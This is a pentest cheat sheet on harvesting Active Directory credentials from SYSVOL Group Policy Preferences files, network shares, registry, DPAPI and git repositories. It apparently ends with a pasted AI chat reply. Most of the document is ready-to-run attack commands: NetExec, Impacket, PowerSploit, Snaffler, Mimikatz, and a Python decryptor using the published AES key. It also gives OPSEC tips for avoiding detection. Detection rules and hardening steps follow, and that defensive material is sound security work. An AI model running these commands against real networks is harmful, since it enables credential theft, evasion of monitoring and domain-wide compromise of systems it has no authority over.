attack-10-credential-hunting-in-shares-gpp-passwords.md (34931B)
1 --- 2 title: "Attack #10 โ Credential Hunting in Shares GPP Passwords" 3 description: "This attack is split into two closely related techniques: GPP Password Decryption (a specific catastrophic vulnerability) and broad credential huntingโฆ" 4 category: active-directory 5 subcategory: "Credential Access" 6 tags: ["active-directory"] 7 tools: ["NetExec", "Impacket", "Mimikatz", "BloodHound", "Metasploit"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-One/๐ด Attack #10 โ Credential Hunting in Shares GPP Passwords.md" 11 --- 12 # ๐ด Attack #10 โ Credential Hunting in Shares / GPP Passwords 13 14 *** 15 16 ## ๐ How It Works 17 18 This attack is split into two closely related techniques: **GPP Password Decryption** (a specific catastrophic vulnerability) and **broad credential hunting across network shares** (a methodology). Both rely on the same fundamental reality โ administrators leave plaintext or weakly obfuscated credentials scattered across the network in scripts, config files, Group Policy XML files, and fileshares, readable by any authenticated domain user. 19 20 **GPP Passwords** are the crown jewel of this category. Group Policy Preferences (GPP) allowed administrators to configure local account passwords, mapped drives, scheduled tasks, and services across the entire domain via XML files stored in the SYSVOL share. Microsoft embedded these passwords encrypted with AES-256 โ but then **published the encryption key in their own MSDN documentation**. Every authenticated domain user has read access to SYSVOL, and the AES key is public, meaning any `cpassword` field in any GPP XML file is effectively plaintext. Microsoft patched the ability to *create* new GPP passwords via MS14-025 in 2014, but **existing GPP passwords were never removed** โ and thousands of enterprise environments still have them sitting in SYSVOL today. 21 22 The published AES-256-CBC key is: 23 ``` 24 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 25 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b 26 ``` 27 28 > โ ๏ธ **Windows 11 / Server 2025:** GPP functionality is **deprecated** in favor of LAPS (Local Administrator Password Solution). However, legacy GPP XML files remain unencrypted in SYSVOL on any DC still supporting older group policies. Modern deployments should use LAPS v2 (Windows LAPS) instead โ see Attack #72 for modern mitigation techniques. If you find GPP passwords in a 2025+ environment, it indicates legacy policy mismanagement. 29 30 ### GPP XML Files to Target 31 32 | File | What It Configures | 33 |---|---| 34 | `Groups.xml` | Local administrator accounts + passwords | 35 | `Services.xml` | Service account credentials | 36 | `Scheduledtasks.xml` | Scheduled task run-as credentials | 37 | `DataSources.xml` | Database connection string credentials | 38 | `Drives.xml` | Mapped drive credentials | 39 | `Printers.xml` | Printer connection credentials | 40 41 ### Broader Credential Hunting Locations 42 43 | Location | What to Look For | 44 |---|---| 45 | `\\DC\SYSVOL\` | GPP XML files (`cpassword`), logon scripts with embedded creds | 46 | `\\DC\NETLOGON\` | Legacy logon scripts (.bat, .vbs, .ps1) with hardcoded passwords | 47 | `C:\` / File shares | `web.config`, `appsettings.json`, `.env`, `*.config` โ database passwords | 48 | IT shares (`\\FS01\IT\`) | Admin toolkits, installation scripts, password lists | 49 | Home drives | User-saved credential files, KeePass databases (.kdbx) | 50 | Sticky notes / Desktop | `passwords.txt`, `creds.xlsx` โ embarrassingly common | 51 | Registry | AutoLogon credentials, LSA cached credentials | 52 | IIS / Web configs | Connection strings with SQL sa password | 53 | Git repositories | Hardcoded API keys, passwords committed to internal repos | 54 55 *** 56 57 ## โ๏ธ Prerequisites 58 59 | Requirement | Detail | 60 |---|---| 61 | **Any valid domain user** | SYSVOL is readable by all Authenticated Users โ zero privilege needed | 62 | **Network access to DC** | Port 445 (SMB) to read SYSVOL and NETLOGON shares | 63 | **Read access to file shares** | For broader credential hunting beyond SYSVOL | 64 | **MS14-025 not applied** | If patched, new GPPs can't be created โ but old ones still exist | 65 66 *** 67 68 ## ๐ ๏ธ Tools 69 70 | Tool | Platform | Role | 71 |---|---|---| 72 | **Get-GPPPassword.ps1** (PowerSploit) | Windows | Auto-finds and decrypts all GPP cpasswords in SYSVOL | 73 | **Impacket โ Get-GPPPassword.py** | Linux | Remote GPP hunting without domain-joined machine | 74 | **CrackMapExec / NetExec** | Linux | `--gpp-passwords` module โ fast automated sweep | 75 | **gpp-decrypt** | Linux | CLI tool to decrypt a single cpassword string | 76 | **pypykatz** | Linux | `gppass` subcommand decrypts cpassword | 77 | **Metasploit** | Both | `post/windows/gather/credentials/gpp` module | 78 | **Snaffler** | Windows | Deep credential hunter across all accessible shares | 79 | **PowerHuntShares** | Windows | PowerShell share auditing + credential discovery | 80 | **SauronEye** | Windows | Targeted file content search across shares | 81 | **Trufflehog** | Linux | Scans git repos for secrets, API keys, hardcoded creds | 82 | **Seatbelt** | Windows | Enumerates credential-related registry keys, cached credentials | 83 | **findstr / grep** | Both | Manual pattern-based credential search | 84 | **BloodHound** | Both | Identifies SYSVOL access paths and share permissions | 85 86 *** 87 88 ## ๐ป Full Commands 89 90 ### ๐ต Part 1 โ GPP Password Attacks 91 92 #### ๐ด Impacket โ Get-GPPPassword.py (Linux โ Fastest Method) 93 94 ```bash 95 # โโ Automatically find and decrypt ALL GPP passwords from Linux โโโโโโโโโโโโโโโ 96 Get-GPPPassword.py corp.local/low_user:'Password1'@DC01.corp.local 97 98 # โโ Using NT hash (no plaintext password) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 99 Get-GPPPassword.py -hashes :8846f7eaee8fb117ad06bdd830b7586c \ 100 corp.local/low_user@DC01.corp.local 101 102 # โโ Parse a locally downloaded XML file โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 103 Get-GPPPassword.py -xmlfile /tmp/Groups.xml LOCAL 104 105 # โโ With Kerberos ticket โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 106 export KRB5CCNAME=low_user.ccache 107 Get-GPPPassword.py -k -no-pass corp.local/low_user@DC01.corp.local 108 ``` 109 110 *** 111 112 #### ๐ด NetExec โ GPP Password Module (Linux) 113 114 ```bash 115 # โโ Sweep all GPP passwords across all accessible DCs โโโโโโโโโโโโโโโโโโโโโโโโ 116 nxc smb 10.10.10.10 -u low_user -p 'Password1' -M gpp_password 117 118 # โโ Using NT hash โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 119 nxc smb 10.10.10.10 -u low_user -H 8846f7eaee8fb117ad06bdd830b7586c -M gpp_password 120 121 # โโ Find autologon credentials stored in GPP (separate module) โโโโโโโโโโโโโโโ 122 nxc smb 10.10.10.10 -u low_user -p 'Password1' -M gpp_autologin 123 ``` 124 125 *** 126 127 #### ๐ด PowerSploit โ Get-GPPPassword (Windows / Domain-Joined) 128 129 ```powershell 130 # โโ Import and run Get-GPPPassword โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 131 Import-Module .\PowerSploit\Exfiltration\Get-GPPPassword.ps1 132 133 # Find and decrypt ALL GPP passwords in SYSVOL 134 Get-GPPPassword 135 136 # Output with full details 137 Get-GPPPassword | Select-Object UserName, Password, Changed, File | Format-Table 138 139 # โโ Manual PowerShell search for cpassword โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 140 Get-ChildItem '\\corp.local\SYSVOL' -Recurse -Include *.xml -ErrorAction SilentlyContinue | 141 Select-String -Pattern 'cpassword' | 142 Select-Object Path, LineNumber, Line 143 144 # โโ Inline search with findstr (no tools needed) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 145 findstr /S /I cpassword \\corp.local\sysvol\*.xml 146 ``` 147 148 *** 149 150 #### ๐ด Manual SYSVOL Enumeration + Decryption (Linux) 151 152 ```bash 153 # โโ Mount SYSVOL share locally โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 154 sudo mount -t cifs //10.10.10.10/SYSVOL /tmp/sysvol \ 155 -o username=low_user,password=Password1,domain=corp.local 156 157 # โโ Recursively search for cpassword โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 158 grep -ria cpassword /tmp/sysvol/ 2>/dev/null 159 160 # โโ Find ALL XML files in SYSVOL โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 161 find /tmp/sysvol/ -name "*.xml" -exec grep -l "cpassword" {} \; 162 163 # โโ View a specific Groups.xml file โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 164 cat "/tmp/sysvol/corp.local/Policies/{GUID}/Machine/Preferences/Groups/Groups.xml" 165 166 # โโ Sample GPP XML cpassword entry looks like: โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 167 # <Properties ... cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" 168 # userName="Administrator" .../> 169 170 # โโ Decrypt with gpp-decrypt โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 171 gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw 172 # Output: MySecretPassword123 173 174 # โโ Decrypt with pypykatz โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 175 pypykatz gppass j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw 176 177 # โโ Manual decryption using Python โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 178 python3 - <<'EOF' 179 import base64 180 from Crypto.Cipher import AES 181 from Crypto.Util.Padding import unpad 182 183 cpassword = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" 184 # Pad base64 string 185 padding = "=" * (4 - len(cpassword) % 4) 186 encrypted = base64.b64decode(cpassword + padding) 187 188 # The published Microsoft AES key 189 key = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b") 190 iv = b'\x00' * 16 191 192 cipher = AES.new(key, AES.MODE_CBC, iv) 193 decrypted = cipher.decrypt(encrypted) 194 # Decode UTF-16LE (Windows Unicode) 195 password = decrypted.decode('utf-16-le').rstrip('\x00') 196 print(f"Decrypted password: {password}") 197 EOF 198 ``` 199 200 *** 201 202 ### ๐ต Part 2 โ Broad Credential Hunting in Shares 203 204 #### ๐ด Snaffler โ Deep Share Credential Hunter (Windows โ Best Tool for This) 205 206 ```powershell 207 # โโ Install / run Snaffler (finds credentials across ALL accessible shares) โโโ 208 .\Snaffler.exe -s -d corp.local -o snaffler_output.log -v data 209 210 # โโ Flags explained: 211 # -s = start snaffling immediately 212 # -d = target domain 213 # -o = output file 214 # -v data = verbose, show file contents with credentials 215 216 # โโ Run against specific shares only โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 217 .\Snaffler.exe -s -d corp.local -n "\\FS01\IT\" -o output.log 218 219 # โโ Snaffler classifies finds by severity โ look for RED and YELLOW hits: 220 # ๐ด RED = credentials / passwords (highest value) 221 # ๐ก YELLOW = interesting config files / sensitive data 222 # ๐ข GREEN = potentially interesting 223 224 # โโ Snaffler finds these automatically: 225 # web.config with <connectionStrings> passwords 226 # appsettings.json with database passwords 227 # .env files with API keys / DB credentials 228 # id_rsa private SSH keys 229 # .rdp files with saved passwords 230 # PowerShell scripts with hardcoded credentials 231 # KeePass .kdbx databases 232 # PuTTY saved sessions with passwords 233 # password.txt / creds.txt / passwords.xlsx 234 ``` 235 236 *** 237 238 #### ๐ด NetExec โ Share Enumeration + Spider (Linux) 239 240 ```bash 241 # โโ Enumerate all accessible shares across subnet โโโโโโโโโโโโโโโโโโโโโโโโโโโโ 242 nxc smb 10.10.10.0/24 -u low_user -p 'Password1' --shares 243 244 # โโ Spider a specific share and search for credential-related files โโโโโโโโโโโ 245 nxc smb 10.10.10.10 -u low_user -p 'Password1' -M spider_plus \ 246 --share IT --pattern "password,pass,cred,secret,key" 247 248 # โโ Download files matching pattern โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 249 nxc smb 10.10.10.10 -u low_user -p 'Password1' -M spider_plus \ 250 --share "Users" --pattern ".xml,.config,.txt,.ps1,.bat,.vbs" 251 ``` 252 253 *** 254 255 #### ๐ด Trufflehog โ Git Repo Credential Scanning (Linux) 256 257 ```bash 258 # โโ Clone internal git repo and scan for secrets โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 259 git clone https://internal-git.corp.local/repo.git 260 trufflehog git file://./repo --json 261 262 # โโ Scan for specific patterns: AWS keys, API tokens, hardcoded passwords โโโโโ 263 trufflehog git file://./repo --regex --patterns "AKIA[0-9A-Z]{16}" --patterns "password.*=.*" 264 265 # โโ Scan all git history (may find deleted credentials) โโโโโโโโโโโโโโโโโโโโโโ 266 trufflehog git file://./repo --scan-entire-history 267 268 # โโ Output format โ look for "verified" secrets (real credentials, not false positives) 269 # "verified": true indicates a secret that passed entropy check 270 ``` 271 272 *** 273 274 #### ๐ด Seatbelt โ Windows Credential Enumeration (Windows) 275 276 ```powershell 277 # โโ Run Seatbelt with credential modules โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 278 .\Seatbelt.exe -group=credentials 279 280 # โโ Specific credential modules: 281 .\Seatbelt.exe LogonPasswords # LSA cached credentials + plaintext 282 .\Seatbelt.exe SavedRDPConnections # RDP .rdp files with saved creds 283 .\Seatbelt.exe MasterKeys # DPAPI master keys (needed for credential decryption) 284 .\Seatbelt.exe CredentialManager # Windows Credential Manager entries 285 .\Seatbelt.exe PuttySSHKeys # PuTTY SSH private keys 286 287 # โโ Extract all cached credentials 288 .\Seatbelt.exe -outputfile=seatbelt_creds.txt 289 ``` 290 291 *** 292 293 #### ๐ด DPAPI Credential Extraction (Windows) 294 295 ```powershell 296 # โโ Extract cached DPAPI credentials โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 297 Get-ChildItem -Path $env:LOCALAPPDATA\Microsoft\Credentials\* 298 Get-ChildItem -Path $env:APPDATA\Microsoft\Credentials\* 299 300 # โโ Decrypt DPAPI credentials (requires user session or admin) โโโโโโโโโโโโโโ 301 Add-Type -AssemblyName System.Security 302 $cred_blob = [System.IO.File]::ReadAllBytes("C:\Users\user\AppData\Local\Microsoft\Credentials\ABC123") 303 $dpapi = New-Object System.Security.Cryptography.DataProtectionScope("CurrentUser") 304 $protected = New-Object System.Security.Cryptography.ProtectedData 305 [System.Text.Encoding]::UTF8.GetString($protected.Unprotect($cred_blob, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)) 306 307 # โโ Alternative โ use Mimikatz for DPAPI master key extraction โโโโโโโโโโโโโโ 308 mimikatz.exe "dpapi::masterkey /in:C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-... /system:system.reg" 309 ``` 310 311 *** 312 313 #### ๐ด Manual Share Credential Hunting (Windows โ No Tools) 314 315 ```powershell 316 # โโ Find password strings in NETLOGON scripts โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 317 findstr /S /I "password" \\corp.local\NETLOGON\*.bat 318 findstr /S /I "password" \\corp.local\NETLOGON\*.ps1 319 findstr /S /I "password" \\corp.local\NETLOGON\*.vbs 320 321 # โโ Hunt across common IT share patterns โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 322 findstr /S /I "password" \\FS01\IT\*.txt 323 findstr /S /I "password" \\FS01\IT\*.ps1 324 findstr /S /I "password" \\FS01\IT\*.bat 325 findstr /S /I "password" \\FS01\Scripts\*.xml 326 327 # โโ Find web.config files with credentials โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 328 Get-ChildItem -Recurse -Filter "web.config" \\FS01\ | 329 Select-String "password|connectionString" | Select-Object Path, Line 330 331 # โโ Hunt for KeePass databases โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 332 Get-ChildItem -Recurse -Filter "*.kdbx" \\FS01\ 2>$null 333 334 # โโ Hunt for private SSH keys โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 335 Get-ChildItem -Recurse -Filter "id_rsa" \\FS01\ 2>$null 336 337 # โโ Registry AutoLogon credentials (local machine) โโโโโโโโโโโโโโโโโโโโโโโโโโโ 338 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 339 # Look for: DefaultUserName, DefaultPassword, DefaultDomainName 340 ``` 341 342 *** 343 344 #### ๐ด Manual Share Credential Hunting (Linux โ Mounted Share) 345 346 ```bash 347 # โโ Mount a target share โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 348 sudo mount -t cifs //10.10.10.20/IT /tmp/IT_share \ 349 -o username=low_user,password=Password1,domain=corp.local 350 351 # โโ Grep for password strings recursively โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 352 grep -ria "password\|passwd\|pwd\|credentials\|secret" /tmp/IT_share/ \ 353 --include="*.xml" --include="*.config" --include="*.txt" \ 354 --include="*.ps1" --include="*.bat" --include="*.vbs" \ 355 --include="*.json" --include="*.env" \ 356 2>/dev/null 357 358 # โโ Find connection strings (database passwords) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 359 grep -ria "connectionString\|Data Source\|Initial Catalog\|User ID\|Password=" \ 360 /tmp/IT_share/ 2>/dev/null 361 362 # โโ Find hardcoded NTLM hashes โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 363 grep -riaP "[0-9a-f]{32}:[0-9a-f]{32}" /tmp/IT_share/ 2>/dev/null 364 365 # โโ Find AWS/Azure/API keys โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 366 grep -riaP "(AKIA[0-9A-Z]{16}|AIza[0-9A-Za-z\-_]{35}|secret_key|api_key)" \ 367 /tmp/IT_share/ 2>/dev/null 368 ``` 369 370 *** 371 372 #### ๐ด Hunting Credentials in Registry (Windows) 373 374 ```powershell 375 # โโ AutoLogon credentials โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 376 Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | 377 Select-Object DefaultUserName, DefaultPassword, DefaultDomainName 378 379 # โโ PuTTY saved sessions (may contain proxy passwords) โโโโโโโโโโโโโโโโโโโโโโโ 380 reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s 381 382 # โโ Windows Credential Manager โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 383 cmdkey /list 384 385 # โโ VNC saved passwords โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 386 reg query HKLM\SOFTWARE\RealVNC\WinVNC4 /v password 387 reg query HKCU\Software\TightVNC\Server 388 389 # โโ SNMP community strings โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 390 reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 391 392 # โโ SCCM / ConfigMgr NAA credentials โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 393 Get-WmiObject -Namespace root\ccm\policy\Machine\ActualConfig ` 394 -Class CCM_NetworkAccessAccount 2>$null 395 ``` 396 397 *** 398 399 #### ๐ด Hunting Credentials with PowerView (Domain-Wide) 400 401 ```powershell 402 Import-Module .\PowerView.ps1 403 404 # โโ Find all accessible shares across the domain โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 405 Find-DomainShare -Verbose 406 407 # โโ Find interesting files on accessible shares โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 408 Find-InterestingDomainShareFile -Include "*.config","*.xml","*.txt","*.bat","*.ps1" 409 410 # โโ Find GPP passwords specifically โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 411 Get-DomainGPO | Get-GPPPassword 412 413 # โโ Search for password files across domain โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 414 Find-InterestingDomainShareFile -Include "*password*","*creds*","*credential*" 415 ``` 416 417 *** 418 419 ## ๐งฉ Troubleshooting 420 421 | Error | Cause | Fix | 422 |---|---|---| 423 | **gpp-decrypt returns garbage / mojibake** | Incorrect base64 padding or corrupted cpassword field | Verify cpassword string is complete; check for XML encoding issues; try pypykatz instead | 424 | **SYSVOL mount fails: "Permission denied"** | User account doesn't have read access to SYSVOL share | Verify user is in domain (not local); try with different credentials; check SMB 445 firewall rule | 425 | **Snaffler "access denied" on specific share** | User account lacks read permissions on target share | Use `nxc smb --shares` to enumerate readable shares first; skip denied shares | 426 | **GPP password changed after XML creation** | Administrator rotated the password locally after GPP was deployed | Verify decrypted password against current accounts; may be outdated โ try on other systems | 427 | **No cpassword fields found in SYSVOL** | Either no GPP policies with embedded credentials exist, or MS14-025 was applied + old XMLs deleted | Try broader credential hunting methods (Snaffler, PowerHuntShares); check if LAPS deployed instead | 428 | **Trufflehog git scan finds nothing** | No credentials committed to git history, or repo is too new | Check commit history depth; expand regex patterns for broader match | 429 | **Seatbelt credential extraction "access denied"** | Requires user token or admin to decrypt DPAPI credentials | Run as admin; try registry-based hunting instead (AutoLogon, PuTTY keys) | 430 | **Decrypted GPP password doesn't work on multiple machines** | Local administrator password was changed manually on some systems after GPP was applied | Test password on each system individually; keep list of which systems use which password | 431 432 *** 433 434 ## ๐ฏ OPSEC Tips 435 436 - **Read SYSVOL over LDAP first, not SMB** โ LDAP-based GPO enumeration generates fewer file access events than direct SMB reads of SYSVOL 437 - **Use Snaffler over manual grep** in engagements โ it's purpose-built, fast, and produces colour-coded output ranked by severity; manual methods trigger more SMB access events 438 - **Don't open files โ read content remotely** โ opening files in interactive applications (Excel, Notepad) generates additional process creation events; use `Get-Content` or `cat` instead 439 - **Start with SYSVOL/NETLOGON** before broader hunting โ these are guaranteed readable by all domain users and frequently contain the highest-value credentials with minimum OPSEC risk 440 - **Check `Groups.xml` first** โ this is where local admin passwords live and is the most common GPP vulnerability encountered in real environments 441 - **Verify GPP cpasswords are still valid** before using them โ the password may have been changed manually even if the GPP XML was never cleaned up 442 - **SCCM Network Access Account (NAA) credentials** are frequently DA-level or broad network access โ always check if SCCM is deployed 443 - **Time-to-execute estimate:** SYSVOL enumeration + decryption (10โ15 min) + broader share hunting (20โ45 min) = 30โ60 minutes total 444 - **Tool versions:** NetExec preferred over CrackMapExec (actively maintained); Snaffler for Windows; Trufflehog v3+ for git scanning 445 446 *** 447 448 ## ๐ก๏ธ Detection โ Event IDs 449 450 | Event ID | Source | What to Look For | 451 |---|---|---| 452 | **5145** | Security Log | Network share object accessed โ bulk reads of `SYSVOL\*.xml` from a single IP | 453 | **5140** | Security Log | Network share accessed โ unusual access to `SYSVOL` or `NETLOGON` from workstations | 454 | **4663** | Security Log | Attempt made to access object โ file reads in SYSVOL (requires object auditing enabled) | 455 | **4688** | Security Log | Process creation โ `findstr.exe` with `cpassword` argument | 456 | **Sysmon EID 1** | Sysmon | `Snaffler.exe`, `Get-GPPPassword.ps1` or `gpp-decrypt` execution | 457 | **Sysmon EID 3** | Sysmon | Network connection from unexpected process to SMB port 445 on DC | 458 | **LDAP query logs** | DC Diagnostic | Bulk GPO object enumeration via LDAP in short time window | 459 460 **Primary detection signature:** Multiple SMB file access events (5145) against `\\DC\SYSVOL\...\Policies\**\*.xml` from a single non-admin workstation within a short window is the clearest indicator. In a normal environment, only domain controllers and management workstations read SYSVOL bulk XML โ a user workstation accessing dozens of GPO XML files is anomalous. 461 462 ### Sigma Rules for Detection 463 464 **Rule: Suspicious GPP XML Enumeration** 465 ```yaml 466 title: Bulk SYSVOL GPP XML Access from Non-DC 467 detection: 468 selection: 469 EventID: 5145 470 ShareName: SYSVOL 471 RelativeTargetName|contains: 'Policies' 472 RelativeTargetName|endswith: '.xml' 473 SourceIP: '!10.10.10.10' # Exclude DC/admin IPs 474 condition: selection | count(SourceIP) by SourceIP > 10 and timespan(5m) 475 ``` 476 477 **Rule: Suspicious gpp-decrypt or Get-GPPPassword Execution** 478 ```yaml 479 title: GPP Password Decryption Tool Execution 480 detection: 481 selection_process: 482 Image|endswith: 483 - 'gpp-decrypt.exe' 484 - 'Get-GPPPassword.ps1' 485 - 'pypykatz.exe' 486 selection_network: 487 DestinationPort: 445 488 Protocol: SMB 489 condition: selection_process and selection_network 490 ``` 491 492 ### EDR-Specific Detections 493 494 - **Crowdstrike Falcon:** Flag Snaffler.exe execution + bulk SMB 445 connections; alert on gpp-decrypt with network activity 495 - **Defender for Endpoint:** Monitor for Get-GPPPassword.ps1 script execution; alert on bulk file reads from SYSVOL 496 - **Sentinel One:** Correlate PowerShell commands containing "cpassword" with file access events 497 - **Carbon Black:** Watch for Python-based credential extraction (trufflehog, pypykatz) with network connections to SMB 498 499 ### Hardening Commands 500 501 ```powershell 502 # โโ Find and DELETE old GPP XML files from SYSVOL โโโโโโโโโโโโโโโโโโโโโโโโโโ 503 Get-ChildItem -Path "\\DC01\SYSVOL\" -Recurse -Include "Groups.xml","Services.xml",` 504 "ScheduledTasks.xml","DataSources.xml","Drives.xml","Printers.xml" | 505 Where-Object {$_.LastWriteTime -lt (Get-Date).AddYears(-1)} | 506 Remove-Item -Force -WhatIf # Remove -WhatIf after verification 507 508 # โโ Deploy LAPS (Local Administrator Password Solution) โโโโโโโโโโโโโโโโโโโโโโ 509 # Install LAPS management tools 510 Install-Module LAPS -Repository PSGallery -Force 511 512 # Configure LAPS via Group Policy 513 # Computer Configuration โ Policies โ Administrative Templates โ 514 # Microsoft LAPS โ Enable LAPS 515 516 # For Windows LAPS (2023+) โ modern replacement for legacy LAPS 517 # Install via Windows Update / WSUS; configure via Group Policy or MDM 518 519 # โโ Enforce LDAP signing to prevent relay attacks (bonus mitigation) โโโโโโโโ 520 dsregcmd /status 521 # Set via Group Policy: 522 # Computer Config โ Windows Settings โ Security Settings โ Local Policies โ 523 # Security Options: 524 # "Domain member: Require strong session key (Windows 2000 or later)" = Enabled 525 # "LDAP client signing requirements" = Require signing 526 527 # โโ Restrict SYSVOL read access (advanced โ breaks some scenarios) โโโโโโโโโโ 528 icacls "\\DC01\SYSVOL" /grant "Domain Computers":(OI)(CI)(F) /T 529 icacls "\\DC01\SYSVOL" /remove "Authenticated Users" /T 530 # WARNING: Only for hardened environments; may break GPO application for workstations 531 532 # โโ Audit SYSVOL access (enable file auditing) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 533 auditpol /set /subcategory:"File Share" /success:enable /failure:enable 534 # Enable object auditing on SYSVOL: 535 # Properties โ Security โ Advanced โ Auditing โ Add "Everyone" with "Read" success 536 ``` 537 538 *** 539 540 ## ๐บ๏ธ MITRE ATT&CK 541 542 | Technique | ID | Description | 543 |---|---|---| 544 | **Credentials in Files** | T1552.001 | Plaintext credentials found in config files, scripts, shares | 545 | **Group Policy Preferences** | T1552.006 | Decryption of GPP cpassword fields using published AES key | 546 | **Unsecured Credentials** | T1552 | General category of credential exposure via unencrypted storage | 547 | **Credential Dumping** | T1003 | DPAPI credential extraction (overlapping technique) | 548 | **Account Discovery** | T1087 | Enumeration of user accounts from GPP + SYSVOL hunting | 549 | **Lateral Movement** | T1570 | Using discovered credentials for PtH, credential spray across domain | 550 551 *** 552 553 ## ๐ Attack Chain Context 554 555 ``` 556 [Credential Hunting / GPP Passwords] โโโ Plaintext Credentials Recovered 557 โ 558 โโโโ ๐ GPP local admin password โ PtH across all domain workstations 559 โโโโ ๐ Service account creds in script โ Kerberoasting target eliminated 560 โโโโ ๐ Database SA password โ direct database access / data exfil 561 โโโโ ๐ซ Valid domain creds โ BloodHound enumeration โ full attack path 562 โโโโ ๐ KeePass .kdbx found โ crack master password โ full vault access 563 โโโโ ๐ Git repo secrets โ API keys, deployment credentials โ lateral access 564 โโโโ ๐ SCCM NAA creds โ often domain-wide read access or DA equivalent 565 566 ``` 567 568 **The compounding effect:** GPP credentials, when found, are almost always **local administrator passwords** deployed domain-wide via GPP โ meaning the **same decrypted password works on every workstation in the domain** simultaneously. A single `cpassword` field in a Groups.xml file from 2016 can still compromise 500 machines in 2026 if it was never rotated. 569 570 **Cross-references:** 571 - Attack #72: LAPS Deprecation & Takeover (modern LAPS v2 as GPP replacement) 572 - Attack #9: mitm6 (complementary technique โ often combined if credentials insufficient) 573 - Kerberoasting (Attack #11+) for service account targeting discovered via credential hunting 574 575 *** 576 577 > โ **Attack #10 โ Credential Hunting / GPP Passwords complete.** 578 > 579 > ๐ **Category 1 โ Credential Attacks is now finished.** That's all 10 attacks in the first category covered with full cheat sheets. 580 > 581 > Tell me to move on when you're ready to begin **Category 2 โ Kerberos Abuse**, starting with **Attack #11 โ Golden Ticket Attack**. 582 583 Sources 584 Plaintext Password Extraction Attack - Netwrix https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/plaintext-password-extraction-attack/ 585 Pentest-Hints/AD Hunting Passwords In SYSVOL.md at master https://github.com/ahmetgurel/Pentest-Hints/blob/master/AD%20Hunting%20Passwords%20In%20SYSVOL.md 586 Group Policy Preferences | The Hacker Recipes https://legacy.thehacker.recipes/a-d/movement/credentials/dumping/group-policies-preferences 587 GPP attacks | Internal Pentest https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/post-compromise-attacks/gpp-attacks 588 Unsecured Credentials: Group Policy Preferences - MITRE ATT&CKยฎ https://attack.mitre.org/techniques/T1552/006/ 589 Hunting Passwords In SYSVOL - Network Intelligence https://www.networkintelligence.ai/blogs/hunting-passwords-in-sysvol/ 590 Password in Group Policy Preferences (GPP) Compromise 